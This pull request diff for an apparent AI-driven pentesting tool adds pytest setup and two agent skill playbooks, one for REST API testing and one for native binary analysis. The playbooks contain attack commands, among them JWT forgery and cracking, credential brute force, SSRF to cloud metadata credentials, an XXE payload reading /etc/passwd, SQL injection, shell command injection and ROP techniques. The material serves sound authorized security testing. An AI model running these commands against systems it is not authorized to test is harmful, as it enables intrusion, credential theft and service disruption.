### PR TITLE
Add asset-class skills for cloud, web3, mobile, binary, and API targets

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-.PHONY: help install dev-install format lint type-check security check-all clean pre-commit setup-dev dev
+.PHONY: help install dev-install format lint type-check security test check-all clean pre-commit setup-dev dev
 
 help:
 	@echo "Available commands:"
@@ -11,6 +11,7 @@ help:
 	@echo "  lint          - Lint code with ruff"
 	@echo "  type-check    - Run type checking with mypy and pyright"
 	@echo "  security      - Run security checks with bandit"
+	@echo "  test          - Run tests with pytest"
 	@echo "  check-all     - Run all code quality checks"
 	@echo ""
 	@echo "Development:"
@@ -50,7 +51,12 @@ security:
 	uv run bandit -r strix/ -c pyproject.toml
 	@echo "✅ Security checks complete!"
 
-check-all: format lint type-check security
+test:
+	@echo "🧪 Running tests with pytest..."
+	uv run pytest
+	@echo "✅ Tests complete!"
+
+check-all: format lint type-check security test
 	@echo "✅ All code quality checks passed!"
 
 pre-commit:

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -54,6 +54,7 @@ dev = [
   "pyright>=1.1.401",
   "bandit>=1.8.3",
   "pre-commit>=4.2.0",
+  "pytest>=8.0.0",
   "pyinstaller>=6.17.0; python_version >= '3.12' and python_version < '3.15'",
 ]
 
@@ -228,6 +229,9 @@ ignore = [
 "strix/interface/tui/app.py" = ["BLE001", "PLC0415", "PLR0912", "PLR0915", "SIM105"]
 "strix/interface/main.py" = ["BLE001", "PLC0415", "PLR0912", "PLR0915"]
 "strix/interface/tui/renderers/agent_message_renderer.py" = ["PLC0415"]
+# Tests are not part of the importable package and reach into module-private
+# helpers under test on purpose.
+"tests/**/*.py" = ["INP001"]
 
 [tool.ruff.lint.isort]
 force-single-line = false
@@ -319,3 +323,8 @@ known_third_party = ["pydantic", "litellm"]
 exclude_dirs = ["docs", "build", "dist"]
 skips = ["B101", "B601", "B404", "B603", "B607"]  # Skip assert, shell injection, subprocess import and partial path checks
 severity = "medium"
+
+[tool.pytest.ini_options]
+testpaths = ["tests"]
+pythonpath = ["."]
+addopts = "-q"

--- a/strix/skills/README.md
+++ b/strix/skills/README.md
@@ -35,6 +35,10 @@ The skills are dynamically injected into the agent's system prompt, allowing it 
 | **`/protocols`** | Protocol-specific testing patterns for GraphQL, WebSocket, OAuth, and other communication standards |
 | **`/tooling`** | Command-line playbooks for core sandbox tools (nmap, nuclei, httpx, ffuf, subfinder, naabu, katana, sqlmap) |
 | **`/cloud`** | Cloud provider security testing for AWS, Azure, GCP, and Kubernetes environments |
+| **`/api`** | REST / HTTP API testing aligned to the OWASP API Security Top 10 (BOLA, broken auth, mass assignment, SSRF, misconfiguration) |
+| **`/web3`** | Web3 / blockchain testing for EVM smart contracts and exposed JSON-RPC nodes / dApp signing flows |
+| **`/mobile`** | Mobile application testing for Android (APK) and iOS (IPA), covering static and dynamic analysis |
+| **`/binary`** | Native executable analysis for ELF, PE, and Mach-O binaries (memory safety, reverse engineering, fuzzing) |
 | **`/reconnaissance`** | Advanced information gathering and enumeration techniques for comprehensive attack surface mapping |
 | **`/custom`** | Community-contributed skills for specialized or industry-specific testing scenarios |
 

--- a/strix/skills/api/rest_api.md
+++ b/strix/skills/api/rest_api.md
@@ -1,0 +1,260 @@
+---
+name: rest-api
+description: REST/HTTP API security testing across the OWASP API Security Top 10 (2023) - spec discovery, BOLA/object-level authz, broken auth, mass assignment, resource consumption, function-level authz, SSRF, misconfiguration, and inventory management
+---
+
+# REST/HTTP API Security Testing
+
+REST and JSON-over-HTTP APIs are the dominant attack surface for modern apps because the authorization logic that a server-rendered UI used to hide is now exposed directly to the client. The same endpoint serves web, mobile, and partner integrations, so the server is the only enforcement boundary — and it routinely fails to enforce per-object and per-function access control. The OWASP API Security Top 10 (2023) is organized around exactly these failures: authorization (API1/API3/API5), authentication (API2), resource abuse (API4/API6), and operational hygiene (API8/API9). Discovery is cheap (specs, JS bundles, mobile traffic) and the highest-yield bugs are logic flaws, not injection, so the load-bearing step is building a per-endpoint, per-role authorization matrix and probing every cell. Cross-reference idor, mass_assignment, authentication_jwt, broken_function_level_authorization, business_logic, and ssrf for the underlying primitives.
+
+## Attack Surface
+
+**Scope**
+- All HTTP verbs against versioned and unversioned route prefixes (`/api`, `/api/v1`, `/v2`, `/rest`, `/graphql`)
+- Documented endpoints plus shadow (undocumented), zombie (orphaned old versions), and deprecated routes still routable
+- Authentication, token issuance, and refresh endpoints (`/auth/login`, `/oauth/token`, `/api/refresh`)
+- File upload/download, export/report, webhook registration, and bulk/batch endpoints
+- Backend-to-backend consumption of third-party APIs (payment, KYC, geocoding, OAuth providers)
+
+**Entry Points**
+- Machine-readable specs: `/openapi.json`, `/swagger.json`, `/v2/api-docs`, `/v3/api-docs`, `/api-docs`, `/swagger/v1/swagger.json`, `/swagger-ui/`, `/redoc`, Postman collection exports
+- GraphQL introspection as a route pointer (`/graphql`, `/api/graphql`) — see graphql for the dedicated surface
+- Client artifacts: JS bundles and sourcemaps (`main.*.js`, `*.js.map`) embedding base URLs and route tables, `robots.txt`, `sitemap.xml`, mobile-app traffic (decompiled APK/IPA strings, runtime proxy capture)
+- WSDL/SOAP descriptors, `.well-known/` (OAuth/OIDC config at `/.well-known/openid-configuration`)
+- Error pages and stack traces leaking framework, route names, and parameter signatures
+
+**Authentication and identity schemes**
+- Bearer/JWT in `Authorization: Bearer <jwt>` — inspect `alg`, `kid`, signature verification, expiry (see authentication_jwt)
+- API keys in headers (`X-API-Key`, `apikey`), query string (`?api_key=`), or basic-auth username slot — often long-lived, broad-scoped, found in JS/mobile
+- OAuth2 / OIDC access tokens, refresh tokens, scope and audience claims
+- mTLS (client certificate) for partner/internal APIs; HMAC request signing (`X-Signature` over body+timestamp+nonce)
+- Session cookies on hybrid APIs; CSRF relevance when cookies (not bearer headers) carry auth
+
+## Key Vulnerabilities
+
+### API1:2023 - Broken Object Level Authorization (BOLA)
+
+The dominant API bug: an endpoint accepts an object identifier and returns/mutates it without checking the caller owns it. Tamper sequential IDs, UUIDs (predictable or leaked elsewhere), email/username keys, and IDs nested in the body or in a JWT-mismatched path. See idor for ID-prediction and oracle techniques.
+
+**Test:**
+```
+# Two accounts: token A (victim obj 1001), token B (attacker). Try A's object with B's token.
+curl -s -H "Authorization: Bearer $TOKEN_B" https://target/api/v1/users/1001/orders
+ffuf -w ids.txt -u https://target/api/v1/invoices/FUZZ -H "Authorization: Bearer $TOKEN_B" \
+  -mc 200 -fs 0 -o bola.json
+curl -s -X PATCH -H "Authorization: Bearer $TOKEN_B" -H 'Content-Type: application/json' \
+  -d '{"status":"paid"}' https://target/api/v1/invoices/1001
+```
+
+### API2:2023 - Broken Authentication
+
+Missing or wrong signature verification, `alg:none`, weak HMAC secrets, accepting expired/revoked tokens, predictable reset tokens, credential stuffing with no rate limit, and OAuth flaws. See authentication_jwt for the full JWT matrix.
+
+**Test:**
+```
+# Fingerprint and attack the JWT: none-alg, key confusion, weak HMAC secret.
+jwt_tool "$JWT" -M at -t https://target/api/v1/me -rh "Authorization: Bearer $JWT"
+jwt_tool "$JWT" -X a                         # forge alg:none
+jwt_tool "$JWT" -C -d /opt/wordlists/jwt.secrets.txt   # crack HMAC secret
+curl -s -H "Authorization: Bearer $FORGED_JWT" https://target/api/v1/admin/users
+ffuf -w creds.txt:CRED -X POST -u https://target/auth/login -H 'Content-Type: application/json' \
+  -d '{"user":"admin","pass":"CRED"}' -mc 200 -ac
+```
+
+### API3:2023 - Broken Object Property Level Authorization
+
+Combines mass assignment (client sets server-controlled fields) and excessive data exposure (response returns more than the client needs). Add privileged keys to write bodies; read responses for fields the UI never shows. See mass_assignment.
+
+**Test:**
+```
+# Mass assignment: inject privileged/internal properties into a create/update.
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H 'Content-Type: application/json' \
+  -d '{"email":"x@x.com","role":"admin","is_verified":true,"account_balance":99999}' \
+  https://target/api/v1/users
+curl -s -X PATCH -H "Authorization: Bearer $TOKEN" -H 'Content-Type: application/json' \
+  -d '{"id":2,"owner_id":2,"approved":true}' https://target/api/v1/projects/5
+# Excessive data exposure: diff full response against UI-rendered fields.
+curl -s -H "Authorization: Bearer $TOKEN" https://target/api/v1/users/me | jq 'keys'
+```
+
+### API4:2023 - Unrestricted Resource Consumption
+
+No rate limiting, unbounded page sizes/limits, costly filters, file-size and batching abuse. Drives DoS and cost amplification.
+
+**Test:**
+```
+# Rate-limit probe: burst and check for 429 / Retry-After.
+seq 1 200 | xargs -P50 -I{} curl -s -o /dev/null -w "%{http_code}\n" \
+  -H "Authorization: Bearer $TOKEN" https://target/api/v1/me | sort | uniq -c
+curl -s -H "Authorization: Bearer $TOKEN" "https://target/api/v1/users?limit=1000000&page_size=100000"
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H 'Content-Type: application/json' \
+  -d '{"ids":['"$(seq -s, 1 100000)"']}' https://target/api/v1/items/bulk
+```
+
+### API5:2023 - Broken Function Level Authorization
+
+Admin/privileged functions reachable by lower-privilege users via guessed paths or HTTP verb tampering. See broken_function_level_authorization.
+
+**Test:**
+```
+# Access admin functions with a non-admin token.
+for p in /api/v1/admin/users /api/v1/admin/config /api/v1/internal/metrics; do
+  curl -s -o /dev/null -w "%{http_code} $p\n" -H "Authorization: Bearer $TOKEN_USER" https://target$p
+done
+# Verb tampering: GET denied but PUT/DELETE/PATCH/HEAD permitted on same route.
+for m in GET POST PUT DELETE PATCH HEAD OPTIONS; do
+  curl -s -o /dev/null -w "%{http_code} $m\n" -X $m -H "Authorization: Bearer $TOKEN_USER" \
+    https://target/api/v1/admin/users/1
+done
+kr scan https://target -w routes-large.kite -H "Authorization: Bearer $TOKEN_USER"
+```
+
+### API6:2023 - Unrestricted Access to Sensitive Business Flows
+
+Automatable abuse of a flow without per-flow throttling/anti-automation: bulk purchase/scalping, coupon/referral farming, mass account or comment creation. See business_logic.
+
+**Test:**
+```
+# Replay a sensitive flow at machine speed (e.g. apply coupon repeatedly, reserve inventory).
+seq 1 500 | xargs -P25 -I{} curl -s -X POST -H "Authorization: Bearer $TOKEN" \
+  -H 'Content-Type: application/json' -d '{"code":"SAVE50"}' \
+  https://target/api/v1/cart/apply-coupon -o /dev/null -w "%{http_code}\n" | sort | uniq -c
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -d '{"order_id":"new"}' https://target/api/v1/checkout
+```
+
+### API7:2023 - Server-Side Request Forgery
+
+Any field that takes a URL, hostname, webhook target, or file reference and is fetched server-side. See ssrf for cloud-metadata, gopher, and DNS-rebinding depth.
+
+**Test:**
+```
+# URL-accepting fields: webhooks, import-from-URL, avatar/image fetch, PDF render callbacks.
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H 'Content-Type: application/json' \
+  -d '{"webhook_url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}' \
+  https://target/api/v1/integrations
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H 'Content-Type: application/json' \
+  -d '{"image_url":"http://$(echo $OAST_DOMAIN)/x.png"}' https://target/api/v1/profile/avatar
+```
+
+### API8:2023 - Security Misconfiguration
+
+Permissive CORS, verbose errors/stack traces, missing security headers, dangerous methods (TRACE/PUT/DELETE), default creds, unpatched components, and missing TLS hardening.
+
+**Test:**
+```
+# CORS: does the server reflect an arbitrary Origin with credentials?
+curl -s -I -H "Origin: https://evil.example" -H "Authorization: Bearer $TOKEN" \
+  https://target/api/v1/me | grep -i 'access-control-allow-'
+curl -s -X OPTIONS -i https://target/api/v1/users | grep -i '^Allow:'
+curl -s -X TRACE -i https://target/ ; curl -s -X PUT --data 'x' -i https://target/api/v1/x.txt
+curl -s -X POST -H 'Content-Type: application/json' -d '{"x":' https://target/api/v1/users
+nuclei -u https://target -tags cors,exposure,misconfig,http -severity medium,high,critical
+```
+
+### API9:2023 - Improper Inventory Management
+
+Old API versions, staging/dev hosts, and deprecated endpoints still live and often less protected than current production.
+
+**Test:**
+```
+for v in v1 v2 v3 beta internal legacy; do
+  curl -s -o /dev/null -w "%{http_code} /$v\n" https://target/api/$v/users
+done
+for h in api-staging api-dev api-test api-uat staging.api; do
+  httpx -silent -u https://$h.target.com/api/v1/health -title -status-code
+done
+```
+
+### API10:2023 - Unsafe Consumption of Third-Party APIs
+
+The target trusts upstream third-party responses (redirects, data, error bodies) without validation, enabling injection or SSRF-like pivots when the upstream is attacker-influenceable.
+
+**Test:**
+```
+# Poison an upstream the target consumes (webhook callback, OAuth userinfo) and return hostile data:
+# malformed/oversized bodies, 3xx to internal hosts, or fields it persists unvalidated.
+curl -s -X POST -H 'Content-Type: application/json' \
+  -d '{"callback":"https://attacker-controlled-upstream/evil"}' https://target/api/v1/oauth/link
+```
+
+### Content-type confusion, parameter pollution, and pagination/filter injection
+
+Switching `Content-Type` (JSON <-> form <-> XML) can route a request past validators or reach a different parser (XXE on XML). Duplicate parameters (HPP) resolve inconsistently across proxy/app. Filter/sort/pagination params often flow into SQL/NoSQL/ORM unsanitized.
+
+**Test:**
+```
+# Content-type confusion: same params as form-encoded may skip JSON-schema validation.
+curl -s -X POST -H 'Content-Type: application/x-www-form-urlencoded' \
+  -d 'role=admin&user=x' https://target/api/v1/users
+# Try XML body for an XXE-capable parser.
+curl -s -X POST -H 'Content-Type: application/xml' \
+  -d '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY e SYSTEM "file:///etc/passwd">]><r>&e;</r>' \
+  https://target/api/v1/import
+curl -s "https://target/api/v1/users?role=user&role=admin" -H "Authorization: Bearer $TOKEN"
+# Filter/sort injection (cross-reference sql_injection).
+curl -s "https://target/api/v1/users?sort=id;SELECT%20pg_sleep(5)--" -H "Authorization: Bearer $TOKEN"
+curl -s -H "Authorization: Bearer $TOKEN" "https://target/api/v1/users?filter[role][\$ne]=null"
+```
+
+## Bypass Techniques
+
+**Authorization-check evasion**
+- Path tricks against gateway/app authz mismatch: `/api/v1/admin/..;/users`, trailing slash, `%2e`, double-encoding, case (`/ADMIN/`), and matrix params (`;`)
+- Verb override headers: `X-HTTP-Method-Override: PUT`, `X-Method-Override`, `_method=DELETE` when the framework honors them
+- Header-trust spoofing: `X-Forwarded-For`, `X-Original-URL`, `X-Rewrite-URL`, `X-Forwarded-Host` to fake internal origin or rewrite the routed path
+
+**Identity and token games**
+- Swap object IDs to match a different tenant while keeping your valid token (BOLA), or mismatch JWT `sub` against path ID
+- Downgrade `Content-Type` or wrap the body to dodge schema-based field allowlists (mass assignment)
+
+**Rate-limit and WAF evasion**
+- Rotate `X-Forwarded-For`/source identifiers, spread across endpoints, or use GraphQL/batch endpoints that count as one request
+
+## Testing Methodology
+
+1. **Discover the spec** - Pull `/openapi.json`, `/swagger.json`, `/v3/api-docs`, Postman exports; harvest routes from JS bundles/sourcemaps and captured mobile traffic via mitmproxy. Import into Postman/newman or convert OpenAPI to an ffuf wordlist.
+2. **Inventory endpoints** - Brute additional routes with kiterunner (`kr scan -w routes-large.kite`) and ffuf; enumerate versions and non-prod hosts with httpx.
+3. **Map authentication** - Identify every scheme (Bearer/JWT, API key, OAuth2, mTLS, HMAC); obtain at least two accounts per role (low-priv, admin, second tenant) plus an unauthenticated baseline.
+4. **Build the authz matrix** - For each endpoint x method x role, record expected vs observed (200/401/403). Every cell where a lower role gets data/action is API1/API5.
+5. **Fuzz parameters** - Discover hidden params with arjun (`arjun -u <endpoint> -m GET,POST,JSON`); test each for mass assignment, injection, IDOR, and SSRF.
+6. **Probe resource limits** - Rate limits, page sizes, batch arrays, costly filters (API4) and sensitive-flow automation (API6).
+7. **Check misconfiguration** - CORS reflection, dangerous methods, verbose errors, missing headers; run nuclei tagged exposure/cors/misconfig and sqlmap on injectable params.
+8. **Chain** - Combine: spec leak -> shadow endpoint -> BOLA read of another tenant -> mass-assignment privilege escalation -> admin function access -> SSRF to cloud metadata.
+
+## Validation
+
+1. Prove BOLA/BFLA with two real accounts: show account B reading or mutating account A's object, including the response body containing A's data.
+2. For broken auth, show a forged/none-alg or cracked-secret token accepted on a protected endpoint (200 + privileged data), not merely a malformed-token rejection.
+3. For mass assignment, GET the object back and confirm the injected privileged field (`role`, `is_admin`, `balance`) actually persisted.
+4. For SSRF, show an OAST callback or returned internal/metadata content — not just a 200 on a URL field.
+5. For resource consumption, demonstrate absence of 429 across a burst and a response time/size that scales with attacker-controlled limits — without exhausting the live service.
+6. Capture full request/response pairs (headers + body) for each finding; replay must be deterministic.
+
+## False Positives
+
+- A 200 with empty/filtered body on an ID swap — the object exists but authorization stripped its contents (not a BOLA read).
+- `alg:none` or modified token returning 401/403 — verification is working; only a 200 with privileged data is a finding.
+- CORS reflecting Origin but with `Access-Control-Allow-Credentials: false` and no sensitive data — low/no impact for credentialed theft.
+- Missing 429 behind an upstream gateway/WAF that enforces rate limiting out-of-band (verify at the edge before flagging API4).
+- A privileged-looking field accepted in the request but ignored server-side — confirm persistence via read-back before claiming mass assignment.
+
+## Impact
+
+- Cross-tenant/cross-user data breach via BOLA and excessive data exposure (the most common real-world API breach pattern).
+- Account takeover and privilege escalation via broken authentication and mass assignment.
+- Full admin-function access through broken function-level authorization and shadow/old-version endpoints.
+- SSRF to cloud metadata -> credential theft -> cloud account compromise.
+- Denial of service and cost amplification from missing resource limits and batch abuse.
+
+## Pro Tips
+
+1. The spec is the map but not the territory — shadow and zombie endpoints (old versions, internal routes) are where authorization is weakest; always brute-force beyond what the spec lists.
+2. Two accounts per role is the single highest-yield setup; nearly every API1/API3/API5 finding requires comparing what account B can do to account A's objects.
+3. Run arjun against every endpoint — hidden parameters (`debug`, `admin`, `is_internal`, `_method`) routinely unlock mass assignment and verb override.
+4. JSON keys are case- and whitespace-sensitive in some stacks but not others; when a privileged field is rejected, retry with casing variants and as a nested object before giving up.
+5. Mobile traffic via mitmproxy reveals undocumented endpoints and long-lived API keys the web app never exposes — proxy the app early.
+6. GraphQL and batch endpoints sidestep per-request rate limits; a single request can carry hundreds of operations (API4/API6) — count operations, not requests.
+
+## Summary
+
+API findings chain into breaches faster than almost any other surface because the server is the only authorization boundary and it routinely under-enforces. The workflow is mechanical: discover the spec and every shadow/old endpoint, enumerate auth schemes, obtain multi-role/multi-tenant accounts, then build and probe a full endpoint x method x role authorization matrix — the OWASP API Top 10 maps cleanly onto its cells. A leaked spec exposes a zombie v1 endpoint; BOLA on it reads another tenant; mass assignment escalates the attacker's role; broken function-level authorization unlocks admin functions; an SSRF field reaches cloud metadata for full account takeover. Test the chain, validate each link with two real accounts and captured request/response pairs, and prove impact without degrading the live service.

--- a/strix/skills/binary/native_executable.md
+++ b/strix/skills/binary/native_executable.md
@@ -1,0 +1,216 @@
+---
+name: native-executable
+description: Native binary security testing across ELF / PE / Mach-O - triage, protection enumeration, memory-corruption and command-injection bugs, fuzzing, and exploitability classification
+---
+
+# Native Executable Security Testing
+
+Compiled executables and shared libraries expose a binary-level attack surface that source-level review misses: memory-corruption bugs (stack/heap overflows, use-after-free, integer overflows), unsafe library calls (`system`, `strcpy`, `sprintf`), hardcoded secrets baked into `.rodata`, and outdated statically-linked dependencies carrying known CVEs. The same triage workflow applies to ELF (Linux), PE (Windows), and Mach-O (macOS) - only the tool flags differ. Mitigations (NX, ASLR/PIE, RELRO, stack canaries, FORTIFY) decide whether a memory bug is a crash or a shell, so enumerating them is the load-bearing first step. The goal is to find untrusted input reaching an unsafe sink, drive a controlled crash through it, and classify whether that crash yields instruction-pointer control or an information leak. For RCE on services that shell out, see rce; for command injection patterns, see command_injection.
+
+## Attack Surface
+
+**Scope**
+- ELF executables and shared objects (`.so`), Linux setuid/setgid binaries, systemd-spawned services
+- PE executables and DLLs (`.exe`, `.dll`), Windows services, scheduled tasks
+- Mach-O binaries and dylibs, macOS LaunchDaemons, codesigned apps
+- Statically and dynamically linked third-party libraries (zlib, OpenSSL, libpng, sqlite) and their bundled versions
+- Network-facing parsers: protocol daemons, file-format parsers, RPC/IPC endpoints
+
+**Entry Points**
+- Command-line arguments and environment variables consumed by setuid binaries
+- File inputs: config files, media/document parsers, archive extractors, firmware blobs
+- Network sockets: listening services, client handlers, deserialization endpoints
+- IPC: Unix sockets, named pipes, D-Bus, shared memory, Windows LPC/ALPC
+- Locally-writable paths the binary trusts (temp files, world-writable configs, `LD_PRELOAD`/`DYLD_INSERT_LIBRARIES` search paths)
+
+**Identity and privilege context**
+- setuid-root / setgid binaries (`find / -perm -4000 -type f`) run attacker input with elevated privilege
+- Windows services running as `SYSTEM`, scheduled tasks, and DLLs loaded by privileged processes (DLL search-order hijack)
+- macOS binaries with `setuid`, entitlements, or installed as root LaunchDaemons
+- Capabilities on Linux (`getcap -r / 2>/dev/null`) - `cap_setuid`, `cap_dac_override` widen impact even without the setuid bit
+
+## Key Vulnerabilities
+
+### Triage and Embedded Secrets
+
+First identify the format, architecture, linkage, and any credentials or sensitive paths compiled into the binary before touching disassembly.
+
+**Test:**
+```
+file ./target && rabin2 -I ./target
+strings -n 8 -t x ./target | grep -iE 'pass(word)?|secret|api[_-]?key|token|BEGIN .*PRIVATE KEY|https?://|/tmp/|aws_'
+nm -D ./target 2>/dev/null; readelf -d ./target | grep NEEDED
+objdump -T ./target.dll 2>/dev/null; rabin2 -z ./target   # PE/Mach-O imports + ASCII/UTF-16 strings
+```
+
+### Dependency CVEs
+
+Bundled or statically-linked libraries ship the vulnerabilities of their frozen version. Extract version banners from `.rodata` and map them to known CVEs.
+
+**Test:**
+```
+strings ./target | grep -iE 'openssl|zlib|libpng|sqlite|curl|libxml2|log4j' | grep -oE '[0-9]+\.[0-9]+(\.[0-9]+)?'
+rabin2 -z ./target | grep -iE 'OpenSSL [0-9]|zlib version'
+syft ./target -o table        # SBOM, then grype sbom:./sbom.json for CVE matching
+```
+
+### Stack Buffer Overflow
+
+Unbounded copies (`strcpy`, `strcat`, `gets`, `sprintf`, `scanf("%s")`, `memcpy` with attacker-controlled length) into fixed stack buffers overwrite the saved return address.
+
+**Test:**
+```
+rabin2 -i ./target | grep -iE 'strcpy|strcat|gets|sprintf|scanf|memcpy'
+# cyclic pattern to find exact offset to saved RIP/EIP
+python3 -c "from pwn import *; print(cyclic(200).decode())" | ./target
+gdb -q -ex 'run < <(python3 -c "from pwn import *; sys.stdout.buffer.write(cyclic(200))")' -ex 'bt' ./target
+# after crash in pwndbg/GEF: cyclic -l $rsp  (or the faulting address) -> offset
+```
+
+### Format String
+
+User input passed directly as the format argument (`printf(user)`, `fprintf(fp, user)`, `syslog(pri, user)`) leaks stack memory with `%p`/`%x` and writes arbitrary memory with `%n`.
+
+**Test:**
+```
+rabin2 -i ./target | grep -iE 'printf|fprintf|snprintf|syslog|err|warn'
+./target "$(python3 -c 'print("%p."*20)')"          # leak: non-literal output proves the bug
+./target "$(python3 -c 'print("AAAA" + "%x."*10)')"  # 41414141 in output = controlled stack read
+# pwntools FmtStr automates the %n write-what-where once offset is known
+```
+
+### Use-After-Free / Double-Free
+
+A pointer dereferenced or freed after its object was already freed. Detect with ASan or Valgrind; confirm the dangling access path in the disassembler.
+
+**Test:**
+```
+clang -fsanitize=address -g src.c -o target_asan && ./target_asan < crashing_input
+valgrind --leak-check=full --track-origins=yes ./target < crashing_input
+# ASan report: "heap-use-after-free" / "double-free" with alloc + free + use stacks
+gdb -q -ex 'run' ./target   # then in pwndbg: 'vis_heap_chunks' to inspect tcache/fastbin reuse
+```
+
+### Heap Overflow
+
+Out-of-bounds write past a heap allocation corrupts adjacent chunk metadata or object pointers (vtables, function pointers).
+
+**Test:**
+```
+clang -fsanitize=address -g src.c -o target_asan && ./target_asan < oversized_input
+# ASan: "heap-buffer-overflow ... WRITE of size N"; note redzone offset
+gdb -q ./target   # pwndbg: 'heap', 'bins', 'vis_heap_chunks' to see corrupted chunk headers
+ltrace -e 'malloc+free+realloc' ./target < input   # correlate sizes with attacker control
+```
+
+### Integer Overflow to Undersized Allocation
+
+An attacker-controlled size multiplied/added before `malloc` wraps, allocating a tiny buffer that a later copy overflows. Look for `malloc(count * size)` and `len + header` without overflow checks.
+
+**Test:**
+```
+rabin2 -i ./target | grep -iE 'malloc|calloc|realloc|alloca'
+# in Ghidra/radare2 decompiler, audit allocation sites for unchecked arithmetic on input-derived len
+clang -fsanitize=integer,address -g src.c -o target_san && ./target_san < input  # UBSan flags the wrap
+# supply len near 2^32 / 2^64 boundary (e.g. 0xffffffff) so size*elem wraps to a small value
+```
+
+### Command Injection via system()/exec
+
+Binaries that build shell command strings from input and pass them to `system`, `popen`, or `execl("/bin/sh","-c",...)` allow injection via `;`, `|`, `$()`, backticks.
+
+**Test:**
+```
+rabin2 -i ./target | grep -iE 'system|popen|execl|execve|ShellExecute|CreateProcess|WinExec'
+# in disassembly, find the format string concatenated before the system() call
+./target "input; id"        # or "$(id)" / "`id`" / "input|id"
+strace -f -e trace=execve ./target "input; id"   # confirms /bin/sh -c with injected command
+```
+
+### Insecure Temp Files / Path Issues
+
+Predictable temp names (`/tmp/app.XXXX`, PID-based), `tmpnam`/`mktemp`-then-open races (TOCTOU), or relative/attacker-writable paths enable symlink attacks and library hijacking.
+
+**Test:**
+```
+rabin2 -i ./target | grep -iE 'tmpnam|tmpfile|mktemp|mkstemp|fopen|access|open|getenv'
+strace -f -e trace=open,openat,access,readlink ./target 2>&1 | grep -E '/tmp/|\.\./|access'
+# symlink race: pre-create /tmp/<predicted_name> -> /etc/passwd, run, check follow
+ltrace -e 'getenv' ./target   # LD_PRELOAD / PATH / config-path env trust on setuid binary
+```
+
+### Hardcoded Credentials / Keys
+
+Embedded passwords, API keys, private keys, or backdoor comparisons compiled into the binary. Static literals live in `.rodata`; comparison logic reveals the expected value.
+
+**Test:**
+```
+rabin2 -z ./target | grep -iE 'pass|key|secret|token|admin|BEGIN .*KEY'
+# locate the string xref, then read the comparison in the decompiler
+r2 -q -c 'izz~password; axt @ <str_addr>' ./target
+# Ghidra headless cross-reference for a string-equality check against the literal
+analyzeHeadless /tmp/proj proj -import ./target -postScript ResolveX86orX64LinuxSyscallsScript.java
+```
+
+## Bypass Techniques
+
+**ASLR / PIE leaks** - A single leaked runtime address (libc symbol via format string, GOT entry, stack/heap pointer) defeats randomization for the whole module. Compute the base by subtracting the symbol's static offset, then derive every gadget/function address relative to it. PIE binaries need a leak of their own `.text` base before ROP into the binary itself.
+
+**ret2libc / ROP** - With NX/DEP on, the stack is non-executable, so reuse existing code. Overwrite the saved return address to chain `system("/bin/sh")` (ret2libc) or stitch gadgets ending in `ret` into a ROP chain. Build chains with `ROPgadget --binary ./target`, `ropper -f ./target --search "pop rdi"`, or pwntools `ROP(elf)`; resolve libc layout from a leak plus the matching libc (`libc-database`).
+
+**GOT / PLT overwrite** - With Partial RELRO (or no RELRO) the GOT is writable. A write primitive (format-string `%n`, arbitrary-write bug) can point a frequently-called PLT-resolved entry (e.g. `free`, `printf`) at `system` or a one-gadget. Confirm GOT writability and entry addresses with `objdump -R ./target` / `readelf -r ./target`.
+
+**Partial RELRO abuse** - Partial RELRO leaves the GOT writable and lazy binding active, so GOT overwrites work; Full RELRO maps the GOT read-only and resolves all symbols at load, closing that path and pushing toward `__malloc_hook`/`__free_hook` (glibc < 2.34), `_dl_runtime_resolve` abuse, or stack pivots. Check the exact level with `checksec` before choosing a strategy.
+
+## Testing Methodology
+
+1. **Triage** - `file` / `rabin2 -I` for format, arch, bits, endianness, linkage (static vs dynamic), and stripped status; pull `strings`, imports (`nm -D`, `objdump -T`), and `NEEDED` libraries
+2. **Enumerate protections** - run `checksec --file=./target` (pwntools `checksec` or the checksec.sh script) and `rabin2 -I` to read NX, PIE/ASLR, RELRO level, canary, and FORTIFY; record the system ASLR setting (`cat /proc/sys/kernel/randomize_va_space`)
+3. **Reverse key functions** - load into Ghidra (`analyzeHeadless` for batch), radare2/rizin (`aaa`, `pdf`), or IDA; locate input handlers, parsers, and dangerous-sink callers
+4. **Identify untrusted input** - trace argv, env, file reads, and socket recv to the unsafe sinks found in triage (`strcpy`, `system`, `malloc(len*..)`, `printf(user)`)
+5. **Fuzz** - harness the input path with AFL++ (`afl-fuzz -i seeds -o out -- ./target @@`) or libFuzzer (`clang -fsanitize=fuzzer,address`); seed with valid samples and compile with ASan for crash visibility
+6. **Reproduce the crash** - replay the crashing input under gdb+pwndbg/GEF; capture the faulting instruction, register state, and backtrace
+7. **Classify exploitability** - determine whether the crash gives saved-return-address/RIP control, a controlled write (`%n`, heap metadata), or only a non-controllable read; map against enabled mitigations to judge real-world severity (use `exploitable`/`!exploitable` heuristics as a starting signal, not proof)
+
+## Validation
+
+1. Show the exact offset to the saved return address with a cyclic pattern (`cyclic`/`pattern_create`) and prove `$rip`/`$eip` (or `$pc`) equals the controlled value (e.g. `0x6161616161616166`) - no shellcode, no payload that runs anything
+2. For info leaks, dump the leaked bytes (libc pointer, canary, stack address) and show they match a real runtime address, demonstrating ASLR defeat without further exploitation
+3. For format strings, show `%p`/`%x` returning live stack data and identify the controllable parameter index - stop before the `%n` write
+4. Capture the sanitizer report (ASan/UBSan/Valgrind) with allocation, free, and faulting stacks as ground truth for UAF/overflow classification
+5. Demonstrate command injection with a benign, observable command (`id`, `whoami`, or an OAST DNS lookup) - never a destructive or persistence payload
+6. Provide the minimal reproducing input (smallest crashing file/arg) plus the precise crash location, not a weaponized exploit
+
+## False Positives
+
+- A crash (SIGSEGV) with no register or memory control - a NULL-pointer deref or read-only fault is a stability bug, not an exploitable primitive
+- `system`/`popen` present in imports but only ever called with fully static, non-input strings
+- "Dangerous" functions (`strcpy`, `sprintf`) used with provably-bounded sizes or length-checked inputs
+- `strings` hits on key-like patterns that are public certificates, test fixtures, or library constants rather than live secrets
+- Stack canary "missing" reported on a function with no stack buffers - the compiler legitimately omits the canary there
+- Sanitizer reports from instrumented test harnesses that exercise paths unreachable from real untrusted input
+
